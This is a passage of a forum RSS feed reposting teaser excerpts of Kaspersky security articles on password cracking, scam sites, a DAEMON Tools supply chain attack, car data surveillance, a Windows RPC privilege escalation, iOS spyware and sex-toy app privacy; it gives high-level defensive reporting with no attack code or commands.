Every time the user enters their password, it’s converted into a hash and compared against the one stored on the server; if the hashes match, the password is correct. If an attacker gets their hands on this hash, they have to decrypt it to recover the original password — this is what’s known as “password cracking”. This is typically done using owned or rented GPUs, and several methods can be employed for the crack:<ul class="mycode_list"><li><a href="https://en.wikipedia.org/wiki/Brute-force_search" target="_blank" rel="noopener" class="mycode_url"><span style="font-weight: bold;" class="mycode_b">Exhaustive enumeration (brute force)</span></a><span style="font-weight: bold;" class="mycode_b">.</span> The computer tries every possible combination of characters, calculating the hash for each one. This method is the easiest way to crack short passwords, or those consisting of a single character set (such as digits only).<br />
</li>
<li><a href="https://en.wikipedia.org/wiki/Rainbow_table" target="_blank" rel="noopener" class="mycode_url"><span style="font-weight: bold;" class="mycode_b">Rainbow tables</span></a><span style="font-weight: bold;" class="mycode_b">.</span> A total nightmare for anyone with a simple password, this is essentially a “phone book” for passwords whose hashes have already been cracked via brute force or smart algorithms. All an attacker has to do is find a matching hash and see which password corresponds to it.<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Smart cracking</span>. These algorithms are trained on databases of leaked passwords. They understand the frequency of different character combinations, and run their checks from the most likely to the least popular sequences. They account for dictionary words, character substitutions (a → @ or s → &#36;), and consider common password structures like “dictionary word + number + special character”, while checking hashes against rainbow tables. Combining these methods significantly accelerates the cracking process.<br />
</li>
</ul>
Beyond that, attackers can also intercept passwords in plain text. There are numerous ways to do this, ranging from phishing (where a victim is lured to a fake web page and enters their password voluntarily) and keyloggers that capture keystrokes, to stealers or Trojans that swipe documents, cookies, clipboard data, and more. Unfortunately, many users keep their passwords as plain text in notes, messaging apps, and documents, or save them in browsers where <a href="https://www.kaspersky.com/blog/how-to-store-passwords-securely/48784/" target="_blank" rel="noopener" class="mycode_url">attackers can extract them in seconds</a>.<br />
<br />
<a href="https://www.kaspersky.com/blog/passwords-hacking-research-2026/55743/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Websites with an undefined trust level: avoiding the trap]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21945</link>
			<pubDate>Thu, 07 May 2026 10:41:29 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21945</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Executive summary</span><ul class="mycode_list"><li>A suspicious website is a web resource that cannot be definitively classified as phishing, but whose activities are unsafe. Such sites manipulate users, tricking them into voluntarily transferring money for non-existent services, signing up for hidden subscriptions, or disclosing personal data through carefully crafted terms of service. These include fake online stores, dubious crypto exchanges, investment platforms, and services with paid subscriptions.<br />
</li>
<li>Kaspersky has introduced a new web filtering category, “Sites with an undefined trust level,” into its security products (Kaspersky Premium, Android and iOS apps, etc.). The system analyzes the domain name and age, IP address reputation, DNS configuration, HTTP security headers, and SSL certificate to automatically detect suspicious resources.<br />
</li>
<li>According to Kaspersky data for January 2026, the most widespread global threat is fake browser extensions that mimic security products — they were detected in 9 out of 10 regions analyzed worldwide. Such extensions intercept browser data, track user activity, hijack search queries, and inject ads.<br />
</li>
<li>Kaspersky’s regional statistics reveal the specific nature of these threats: in Africa, over 90% of the top 10 suspicious websites are online trading scam platforms; in Latin America, fake betting services predominate; in Russia, fake binary options brokers and “educational platforms” with fraudulent subscriptions lead the way; in CIS countries — crypto scams and bots for inflating engagement.<br />
</li>
<li>Key indicators of a suspicious website to check: a strange domain name with numbers or random characters, cheap top-level domains (.xyz, .top, .shop), a recently registered domain (less than 6 months old according to WHOIS data), unrealistic promises (“100% guaranteed income,” “up to 300% profit”), lack of company contact information, and payments only via cryptocurrency or irreversible bank transfers.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Introduction</span><br />
<br />
The online landscape is filled with various traps lying in wait for users. One such threat involves websites that can’t be strictly classified as phishing, yet whose activities are inherently unsafe. These sites often operate on the fringes of the law, even if they aren’t directly violating it. Sometimes they use a cleverly crafted Terms of Service document as a loophole. These agreements might include clauses such as no-refund policies or forced automatic subscription renewals.<br />
<br />
<a href="https://securelist.com/suspicious-websites-undefined-trust-level/119675/?kaspr=zsu7" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Executive summary</span><ul class="mycode_list"><li>A suspicious website is a web resource that cannot be definitively classified as phishing, but whose activities are unsafe. Such sites manipulate users, tricking them into voluntarily transferring money for non-existent services, signing up for hidden subscriptions, or disclosing personal data through carefully crafted terms of service. These include fake online stores, dubious crypto exchanges, investment platforms, and services with paid subscriptions.<br />
</li>
<li>Kaspersky has introduced a new web filtering category, “Sites with an undefined trust level,” into its security products (Kaspersky Premium, Android and iOS apps, etc.). The system analyzes the domain name and age, IP address reputation, DNS configuration, HTTP security headers, and SSL certificate to automatically detect suspicious resources.<br />
</li>
<li>According to Kaspersky data for January 2026, the most widespread global threat is fake browser extensions that mimic security products — they were detected in 9 out of 10 regions analyzed worldwide. Such extensions intercept browser data, track user activity, hijack search queries, and inject ads.<br />
</li>
<li>Kaspersky’s regional statistics reveal the specific nature of these threats: in Africa, over 90% of the top 10 suspicious websites are online trading scam platforms; in Latin America, fake betting services predominate; in Russia, fake binary options brokers and “educational platforms” with fraudulent subscriptions lead the way; in CIS countries — crypto scams and bots for inflating engagement.<br />
</li>
<li>Key indicators of a suspicious website to check: a strange domain name with numbers or random characters, cheap top-level domains (.xyz, .top, .shop), a recently registered domain (less than 6 months old according to WHOIS data), unrealistic promises (“100% guaranteed income,” “up to 300% profit”), lack of company contact information, and payments only via cryptocurrency or irreversible bank transfers.<br />
</li>
</ul>
<span style="font-weight: bold;" class="mycode_b">Introduction</span><br />
<br />
The online landscape is filled with various traps lying in wait for users. One such threat involves websites that can’t be strictly classified as phishing, yet whose activities are inherently unsafe. These sites often operate on the fringes of the law, even if they aren’t directly violating it. Sometimes they use a cleverly crafted Terms of Service document as a loophole. These agreements might include clauses such as no-refund policies or forced automatic subscription renewals.<br />
<br />
<a href="https://securelist.com/suspicious-websites-undefined-trust-level/119675/?kaspr=zsu7" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[DAEMON Tools software infected – supply chain attack ongoing since April 8, 2026]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21939</link>
			<pubDate>Tue, 05 May 2026 11:35:49 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21939</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">What happened?</span><br />
<br />
In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active. Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer company of DAEMON Tools, so that further actions could be taken to remediate the attack consequences.<br />
<br />
<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/05/05033425/1.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/05/05033425/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></a><br />
<br />
Starting from early April, we observed several thousand infection attempts involving DAEMON Tools in our telemetry, with individuals and organizations in more than 100 countries being affected. However, out of all the machines infected, we have observed further-stage payloads being deployed to only a dozen of them. These machines that received further payloads belonged to retail, scientific, government and manufacturing organizations – and this indicates that the supply chain attack is targeted in nature.<br />
<br />
Kaspersky solutions protect their users from the malicious payloads deployed through the DAEMON Tools supply chain attack.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Trojanized binaries</span><br />
<br />
Our analysis revealed that for DAEMON Tools versions from 12.5.0.2421 to 12.5.0.2434, attackers have managed to compromise the following binaries inside the software installations:<ul class="mycode_list"><li>DTHelper.exe<br />
</li>
<li>DiscSoftBusServiceLite.exe<br />
</li>
<li>DTShellHlp.exe<br />
</li>
</ul>
These files are located in the directory where DAEMON Tools is installed, for example<br />
 <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>C:&#92;Program Files&#92;DAEMON Tools Lite</code></div></div>. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft.<br />
<br />
<a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">What happened?</span><br />
<br />
In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active. Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer company of DAEMON Tools, so that further actions could be taken to remediate the attack consequences.<br />
<br />
<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/05/05033425/1.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/05/05033425/1.png" loading="lazy"  alt="[Image: 1.png]" class="mycode_img" /></a><br />
<br />
Starting from early April, we observed several thousand infection attempts involving DAEMON Tools in our telemetry, with individuals and organizations in more than 100 countries being affected. However, out of all the machines infected, we have observed further-stage payloads being deployed to only a dozen of them. These machines that received further payloads belonged to retail, scientific, government and manufacturing organizations – and this indicates that the supply chain attack is targeted in nature.<br />
<br />
Kaspersky solutions protect their users from the malicious payloads deployed through the DAEMON Tools supply chain attack.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Trojanized binaries</span><br />
<br />
Our analysis revealed that for DAEMON Tools versions from 12.5.0.2421 to 12.5.0.2434, attackers have managed to compromise the following binaries inside the software installations:<ul class="mycode_list"><li>DTHelper.exe<br />
</li>
<li>DiscSoftBusServiceLite.exe<br />
</li>
<li>DTShellHlp.exe<br />
</li>
</ul>
These files are located in the directory where DAEMON Tools is installed, for example<br />
 <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>C:&#92;Program Files&#92;DAEMON Tools Lite</code></div></div>. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft.<br />
<br />
<a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Is your car spying on you?]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21932</link>
			<pubDate>Thu, 30 Apr 2026 08:14:47 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21932</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">How law enforcement and intelligence agencies leverage data from connected vehicles, and what your car might be leaking about you.</span><br />
 <br />
It’s best to think of the modern car as a computer on wheels — one that constantly offloads diagnostic data to the manufacturer or dealer’s servers. On board, you’ll find dozens of sensors: everything from GPS, speedometers, and hands-free microphones, to external cameras and the less obvious (but highly active) sensors for pedal pressure, tire pressure, engine temperature, and more. Even if this data isn’t beamed to the manufacturer in real-time, it’s logged in the car’s internal memory, and can reveal a wealth of information about a driver’s trips, habits, and surroundings. We’ve already taken a deep dive into how <a href="https://www.kaspersky.com/blog/spies-on-wheels-how-carmakers-sell-your-intimate-data/49341/" target="_blank" rel="noopener" class="mycode_url">automakers collect data for commercial use</a>, and <a href="https://www.kaspersky.com/blog/car-manufacturers-silently-sell-user-telematics-data/51245/" target="_blank" rel="noopener" class="mycode_url">who they sell it to</a> (spoiler alert: insurance companies are the biggest buyers of telemetry), but today we’re looking at how law enforcement and intelligence agencies tap into this goldmine.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Digital evidence</span><br />
<br />
Police departments across the globe have recognized the immense value of data stored within vehicles. If a car or its owner is potentially linked to a crime, investigators do more than just check for prints or DNA. Car Intelligence (CARINT) technology allows them to essentially scour all onboard computers, extracting data such as:<ul class="mycode_list"><li>GPS-based trip history<br />
</li>
<li>Call logs, media player activity, and voice commands<br />
</li>
<li>Lists of paired devices and synced contact lists<br />
</li>
<li>Driving statistics: mileage, engine performance modes, and other technical parameters<br />
</li>
</ul>
There are numerous precedents where this data has served as evidence and dismantled alibis. In one U.S. criminal case, <a href="https://www.nbcnews.com/tech/tech-news/snitches-wheels-police-turn-car-data-destroy-suspects-alibis-n1251939" target="_blank" rel="noopener" class="mycode_url">a recorded voice command became a smoking gun</a>, proving the suspect was behind the wheel of a stolen vehicle.<br />
<br />
With the rise of connected cars equipped with their own SIM cards and direct links to the manufacturer, law enforcement no longer needs physical access to the vehicle. Key data, such as GPS location history, can be pulled directly from the manufacturer’s servers. Furthermore, a <a href="https://www.carscoops.com/2024/05/senators-accuse-bmw-toyota-and-seven-other-brands-of-giving-up-consumer-location-data-without-a-warrant/" target="_blank" rel="noopener" class="mycode_url">U.S. Senate investigation revealed</a> that nine out of 14 surveyed automakers were providing this data without a warrant.<br />
<br />
Major suppliers of car intelligence software, such as Ateros, Berla, TA9/Rayzone, and Toka, sell their solutions exclusively to government and law enforcement agencies, which is why they’ve remained largely out of the public eye.<br />
<br />
<a href="https://www.kaspersky.com/blog/the-car-that-spied-on-you-carint/55680/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">How law enforcement and intelligence agencies leverage data from connected vehicles, and what your car might be leaking about you.</span><br />
 <br />
It’s best to think of the modern car as a computer on wheels — one that constantly offloads diagnostic data to the manufacturer or dealer’s servers. On board, you’ll find dozens of sensors: everything from GPS, speedometers, and hands-free microphones, to external cameras and the less obvious (but highly active) sensors for pedal pressure, tire pressure, engine temperature, and more. Even if this data isn’t beamed to the manufacturer in real-time, it’s logged in the car’s internal memory, and can reveal a wealth of information about a driver’s trips, habits, and surroundings. We’ve already taken a deep dive into how <a href="https://www.kaspersky.com/blog/spies-on-wheels-how-carmakers-sell-your-intimate-data/49341/" target="_blank" rel="noopener" class="mycode_url">automakers collect data for commercial use</a>, and <a href="https://www.kaspersky.com/blog/car-manufacturers-silently-sell-user-telematics-data/51245/" target="_blank" rel="noopener" class="mycode_url">who they sell it to</a> (spoiler alert: insurance companies are the biggest buyers of telemetry), but today we’re looking at how law enforcement and intelligence agencies tap into this goldmine.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Digital evidence</span><br />
<br />
Police departments across the globe have recognized the immense value of data stored within vehicles. If a car or its owner is potentially linked to a crime, investigators do more than just check for prints or DNA. Car Intelligence (CARINT) technology allows them to essentially scour all onboard computers, extracting data such as:<ul class="mycode_list"><li>GPS-based trip history<br />
</li>
<li>Call logs, media player activity, and voice commands<br />
</li>
<li>Lists of paired devices and synced contact lists<br />
</li>
<li>Driving statistics: mileage, engine performance modes, and other technical parameters<br />
</li>
</ul>
There are numerous precedents where this data has served as evidence and dismantled alibis. In one U.S. criminal case, <a href="https://www.nbcnews.com/tech/tech-news/snitches-wheels-police-turn-car-data-destroy-suspects-alibis-n1251939" target="_blank" rel="noopener" class="mycode_url">a recorded voice command became a smoking gun</a>, proving the suspect was behind the wheel of a stolen vehicle.<br />
<br />
With the rise of connected cars equipped with their own SIM cards and direct links to the manufacturer, law enforcement no longer needs physical access to the vehicle. Key data, such as GPS location history, can be pulled directly from the manufacturer’s servers. Furthermore, a <a href="https://www.carscoops.com/2024/05/senators-accuse-bmw-toyota-and-seven-other-brands-of-giving-up-consumer-location-data-without-a-warrant/" target="_blank" rel="noopener" class="mycode_url">U.S. Senate investigation revealed</a> that nine out of 14 surveyed automakers were providing this data without a warrant.<br />
<br />
Major suppliers of car intelligence software, such as Ateros, Berla, TA9/Rayzone, and Toka, sell their solutions exclusively to government and law enforcement agencies, which is why they’ve remained largely out of the public eye.<br />
<br />
<a href="https://www.kaspersky.com/blog/the-car-that-spied-on-you-carint/55680/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[PhantomRPC: A new privilege escalation technique in Windows RPC]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21907</link>
			<pubDate>Fri, 24 Apr 2026 10:53:40 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21907</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Intro</span><br />
<br />
Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.<br />
<br />
In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.<br />
<br />
I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.<br />
<br />
Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">MSRPC</span><br />
<br />
Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.<br />
<br />
<a href="https://securelist.com/phantomrpc-rpc-vulnerability/119428/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Intro</span><br />
<br />
Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.<br />
<br />
In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.<br />
<br />
I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.<br />
<br />
Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">MSRPC</span><br />
<br />
Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.<br />
<br />
<a href="https://securelist.com/phantomrpc-rpc-vulnerability/119428/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[The iPhone — invincible no more: a look at DarkSword and Coruna]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21855</link>
			<pubDate>Sat, 18 Apr 2026 06:28:19 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21855</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">The emergence of DarkSword and Coruna — new malware targeting iOS — shows exactly how government intelligence tools are being repurposed as weapons for cybercriminals. We break down how these attacks work, why they’re so dangerous, and what you can do to not get infected.</span><br />
 <br />
DarkSword and Coruna are two new tools for invisible attacks on iOS devices. These attacks require no user interaction and are already being actively used by bad actors in the wild. Before these threats emerged, most iPhone users didn’t have to lose sleep over their data security. Protection was really only a major concern for a narrow group — politicians, activists, diplomats, high-level business execs, and others who handle extremely sensitive data — who might be targeted by foreign intelligence agencies. We’ve <a href="https://www.kaspersky.com/blog/predator-spyware-ios-recording-indicator-bypass/55463/" target="_blank" rel="noopener" class="mycode_url">covered sophisticated spyware</a> used against such a group before — noting how hard to come by those tools were.<br />
<br />
However, DarkSword and Coruna — discovered by researchers earlier this year — are total game-changers. This malware is being used for mass infections of everyday users. In this post, we dive into why this shift happened, why these tools are so dangerous, and how you can stay protected.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What we know about DarkSword, and how it can target your iPhone</span><br />
<br />
In mid-March 2026, three separate research teams coordinated the <a href="https://www.wired.com/story/hundreds-of-millions-of-iphones-can-be-hacked-with-a-new-tool-found-in-the-wild/" target="_blank" rel="noopener" class="mycode_url">release of their findings on a new spyware strain</a> called DarkSword. This tool is capable of silently hacking devices running iOS 18 without the user ever knowing something is wrong.<br />
<br />
First, we should clear up some confusion: iOS 18 isn’t as vintage as it might sound. Even though the <a href="https://en.wikipedia.org/wiki/IOS_26" target="_blank" rel="noopener" class="mycode_url">latest version is iOS 26</a>, Apple recently overhauled its versioning system, which threw everyone for a loop. They decided to jump ahead eight versions — from 18 straight to 26 — so the OS number matches the current year. Despite the jump, Apple estimates that <a href="https://developer.apple.com/support/app-store/" target="_blank" rel="noopener" class="mycode_url">about a quarter of all active devices still run iOS 18 or older</a>.<br />
<br />
<a href="https://www.kaspersky.com/blog/ios-exploits-darksword-and-coruna-in-mass-attacks/55622/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">The emergence of DarkSword and Coruna — new malware targeting iOS — shows exactly how government intelligence tools are being repurposed as weapons for cybercriminals. We break down how these attacks work, why they’re so dangerous, and what you can do to not get infected.</span><br />
 <br />
DarkSword and Coruna are two new tools for invisible attacks on iOS devices. These attacks require no user interaction and are already being actively used by bad actors in the wild. Before these threats emerged, most iPhone users didn’t have to lose sleep over their data security. Protection was really only a major concern for a narrow group — politicians, activists, diplomats, high-level business execs, and others who handle extremely sensitive data — who might be targeted by foreign intelligence agencies. We’ve <a href="https://www.kaspersky.com/blog/predator-spyware-ios-recording-indicator-bypass/55463/" target="_blank" rel="noopener" class="mycode_url">covered sophisticated spyware</a> used against such a group before — noting how hard to come by those tools were.<br />
<br />
However, DarkSword and Coruna — discovered by researchers earlier this year — are total game-changers. This malware is being used for mass infections of everyday users. In this post, we dive into why this shift happened, why these tools are so dangerous, and how you can stay protected.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What we know about DarkSword, and how it can target your iPhone</span><br />
<br />
In mid-March 2026, three separate research teams coordinated the <a href="https://www.wired.com/story/hundreds-of-millions-of-iphones-can-be-hacked-with-a-new-tool-found-in-the-wild/" target="_blank" rel="noopener" class="mycode_url">release of their findings on a new spyware strain</a> called DarkSword. This tool is capable of silently hacking devices running iOS 18 without the user ever knowing something is wrong.<br />
<br />
First, we should clear up some confusion: iOS 18 isn’t as vintage as it might sound. Even though the <a href="https://en.wikipedia.org/wiki/IOS_26" target="_blank" rel="noopener" class="mycode_url">latest version is iOS 26</a>, Apple recently overhauled its versioning system, which threw everyone for a loop. They decided to jump ahead eight versions — from 18 straight to 26 — so the OS number matches the current year. Despite the jump, Apple estimates that <a href="https://developer.apple.com/support/app-store/" target="_blank" rel="noopener" class="mycode_url">about a quarter of all active devices still run iOS 18 or older</a>.<br />
<br />
<a href="https://www.kaspersky.com/blog/ios-exploits-darksword-and-coruna-in-mass-attacks/55622/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[What happens in the bedroom stays in the bedroom]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21811</link>
			<pubDate>Mon, 13 Apr 2026 11:20:10 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21811</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Smart sex toys and their companion apps collect and process some extremely personal data. We break down the risks involved, and ways to protect your privacy.</span><br />
 <br />
The smart-home craze has connected everything — from your lightbulbs to your tea kettle — to the internet, and the adult industry isn’t sitting this one out: manufacturers are releasing more smart models than ever. While syncing a sex toy to your smartphone unlocks some cool extra features, it also opens the door to potential security and privacy headaches. The good news? You can significantly lower most of these risks just by tweaking your settings and adjusting your usage habits.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How sex-toy apps actually work</span><br />
<br />
To be clear upfront, while researchers have successfully <a href="https://internetofdon.gs/no-youre-not-going-to-cheat-at-chess-with-a-buttplug/" target="_blank" rel="noopener" class="mycode_url">hijacked</a> sex toys in controlled experiments, the odds of a hacker remotely taking over your vibrator in the real world are pretty slim. In this post, we focus on the more realistic risks: your privacy and the safety of your data.<br />
<br />
Most modern adult toys link up with the manufacturer’s app. These apps offer a range of usage options: you can control the device yourself, or hand over the remote to a partner — anywhere in the world via the internet.<br />
<br />
Beyond just basic controls, many of these apps have social features: private messaging, group chats, calls, and even video sessions. In fact, you don’t even need a physical device to use some of them; you just create an account. Because of this, some of these services have essentially evolved into niche dating platforms.<br />
<br />
The toy and your phone talk to each other via Bluetooth — with minimal risks. To handle social features or remote control, the app connects to a cloud server. This creates a constant stream of data moving back and forth: everything from commands to private messages.<br />
<br />
Here’s the catch: even if you only use the app to control your toy locally via Bluetooth, you still get connected to that cloud server. That means you’re inheriting all the security and privacy risks.<br />
<br />
<a href="https://www.kaspersky.com/blog/sex-toy-app-privacy-security-guide/55600/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Smart sex toys and their companion apps collect and process some extremely personal data. We break down the risks involved, and ways to protect your privacy.</span><br />
 <br />
The smart-home craze has connected everything — from your lightbulbs to your tea kettle — to the internet, and the adult industry isn’t sitting this one out: manufacturers are releasing more smart models than ever. While syncing a sex toy to your smartphone unlocks some cool extra features, it also opens the door to potential security and privacy headaches. The good news? You can significantly lower most of these risks just by tweaking your settings and adjusting your usage habits.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How sex-toy apps actually work</span><br />
<br />
To be clear upfront, while researchers have successfully <a href="https://internetofdon.gs/no-youre-not-going-to-cheat-at-chess-with-a-buttplug/" target="_blank" rel="noopener" class="mycode_url">hijacked</a> sex toys in controlled experiments, the odds of a hacker remotely taking over your vibrator in the real world are pretty slim. In this post, we focus on the more realistic risks: your privacy and the safety of your data.<br />
<br />
Most modern adult toys link up with the manufacturer’s app. These apps offer a range of usage options: you can control the device yourself, or hand over the remote to a partner — anywhere in the world via the internet.<br />
<br />
Beyond just basic controls, many of these apps have social features: private messaging, group chats, calls, and even video sessions. In fact, you don’t even need a physical device to use some of them; you just create an account. Because of this, some of these services have essentially evolved into niche dating platforms.<br />
<br />
The toy and your phone talk to each other via Bluetooth — with minimal risks. To handle social features or remote control, the app connects to a cloud server. This creates a constant stream of data moving back and forth: everything from commands to private messages.<br />
<br />
Here’s the catch: even if you only use the app to control your toy locally via Bluetooth, you still get connected to that cloud server. That means you’re inheriting all the security and privacy risks.<br />
<br />
<a href="https://www.kaspersky.com/blog/sex-toy-app-privacy-security-guide/55600/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[A laughing RAT: CrystalX combines spyware, stealer, and prankware features]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21704</link>
			<pubDate>Wed, 01 Apr 2026 07:19:11 +0000</pubDate>
